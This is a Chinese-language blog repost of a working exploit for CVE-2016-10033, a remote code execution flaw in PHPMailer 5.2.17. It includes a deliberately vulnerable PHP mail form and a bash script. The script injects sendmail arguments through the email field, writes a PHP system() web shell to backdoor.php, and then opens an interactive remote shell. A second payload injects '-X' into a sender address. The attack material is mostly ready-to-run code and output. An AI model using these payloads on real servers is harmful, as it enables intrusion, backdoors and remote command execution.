欢迎光临
我们一直在努力

PHPMailer 5.2.17 – Remote Code Execution

坦白的说,看到限制条件就觉得不爱了,搞得上班还迟到.就是没有注意看条件.要是直接docker运行多好。
Before this commit in class.phpmailer.php in a certain scenarion there is no filter in the sender’s email address special chars. This flaw can lead to a remote code execution, via
mail

function here.

To trigger this code, you need:


* PHPMailer < 5.2.18 * Compile PHP without PCRE. * PHP version must be inferior to 5.2.0.

So you can bypass the sender’s email validation on

validateAddress

function, setting

patternselect

to

noregex

. To make easier to archieve such environment without having to setup PHP like this I just hardcoded it this code.
作者是本地进行调试的

python -m smtpd -n -c DebuggingServer localhost:25

测试漏洞的代码

<html> <head>     <title>Vulnerable Mail Form</title> </head> <body>      <h1> Vulnerable mail form </h1>      <form  action="" method="POST" enctype="multipart/form-data">         <input type="hidden" name="action" value="submit">         Your name:<br>         <input name="name" type="text" value="" size="30"/><br>         Your email:<br>         <input name="email" type="text" value="" size="30"/><br>         Your message:<br>         <textarea name="message" rows="7" cols="30"></textarea><br>         <input type="submit" value="Send email"/>     </form>     <pre> <?php $action=$_REQUEST['action']; if ($action!=""){     $name=$_REQUEST['name'];     $email=$_REQUEST['email'];     $message=$_REQUEST['message'];     if (($name=="")||($email=="")||($message=="")){         echo "There are missing fields.";     }else{            require 'vulnerable/PHPMailerAutoload.php';         $mail = new PHPMailer;         $mail->Host = "localhost";          $mail->setFrom($email, 'Vulnerable Server');         $mail->addAddress('admin@vulnerable.com', 'Hacker');         $mail->Subject  = "Message from $name";         $mail->Body     = $message;         if(!$mail->send()) {             echo 'Message was not sent.';             echo 'Mailer error: ' . $mail->ErrorInfo;         } else {             echo 'Message has been sent.';         }      } }   ?>     </pre>      </body>  </html> 

利用代码

#!/bin/bash # CVE-2016-10033 exploit by opsxcq # https://github.com/opsxcq/exploit-CVE-2016-10033  echo '[+] CVE-2016-10033 exploit by opsxcq'  if [ -z "$1" ] then     echo '[-] Please inform an host as parameter'     exit -1 fi  host=$1  echo '[+] Exploiting '$host  curl -sq 'http://'$host -H 'Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzXJpHSq4mNy35tHe' --data-binary $'------WebKitFormBoundaryzXJpHSq4mNy35tHe/r/nContent-Disposition: form-data; name="action"/r/n/r/nsubmit/r/n------WebKitFormBoundaryzXJpHSq4mNy35tHe/r/nContent-Disposition: form-data; name="name"/r/n/r/n<?php echo "|".base64_encode(system(base64_decode($_GET["cmd"])))."|"; ?>/r/n------WebKitFormBoundaryzXJpHSq4mNy35tHe/r/nContent-Disposition: form-data; name="email"/r/n/r/nvulnerables@ -OQueueDirectory=/tmp -X/www/backdoor.php/r/n------WebKitFormBoundaryzXJpHSq4mNy35tHe/r/nContent-Disposition: form-data; name="message"/r/n/r/nPwned/r/n------WebKitFormBoundaryzXJpHSq4mNy35tHe--/r/n' >/dev/null && echo '[+] Target exploited, acessing shell at http://'$host'/backdoor.php'  cmd='whoami' while [ "$cmd" != 'exit' ] do     echo '[+] Running '$cmd     curl -sq http://$host/backdoor.php?cmd=$(echo -ne $cmd | base64) | grep '|' | head -n 1 | cut -d '|' -f 2 | base64 -d     echo     read -p 'RemoteShell> ' cmd done echo '[+] Exiting' 

After the exploitation, a file called backdoor.php will be stored on the root folder of the web directory. And the exploit will drop you a shell where you can send commands to the backdoor:


./exploit.sh localhost:8080 [+] CVE-2016-10033 exploit by opsxcq [+] Exploiting localhost:8080 [+] Target exploited, acessing shell at http://localhost:8080/backdoor.php [+] Running whoami www-data

更新一个phithon的payload

&lt;?php require 'PHPMailer/PHPMailerAutoload.php';  function send($from) {     $mail = new PHPMailer;      $mail-&gt;setFrom($from);     $mail-&gt;addAddress('joe@example.net', 'Joe User');     // Add a recipient      $mail-&gt;isHTML(true);                                  // Set email format to HTML      $mail-&gt;Subject = '&lt;?php phpinfo(); ?&gt;';     $mail-&gt;Body    = 'This is the HTML message body &lt;b&gt;in bold!&lt;/b&gt;';     $mail-&gt;AltBody = 'This is the body in plain text for non-HTML mail clients';      if(!$mail-&gt;send()) {         echo 'Message could not be sent.';         echo 'Mailer Error: ' . $mail-&gt;ErrorInfo;     } else {         echo 'Message has been sent' . "/n";     }      unset($mail); }  $address = "aaa( -X/home/www/success.php )@qq.com";  send($address);

执行:
white PHPMailer 5.2.17 - Remote Code Execution

未经允许不得转载:杂术馆 » PHPMailer 5.2.17 – Remote Code Execution
分享到: 更多 (0)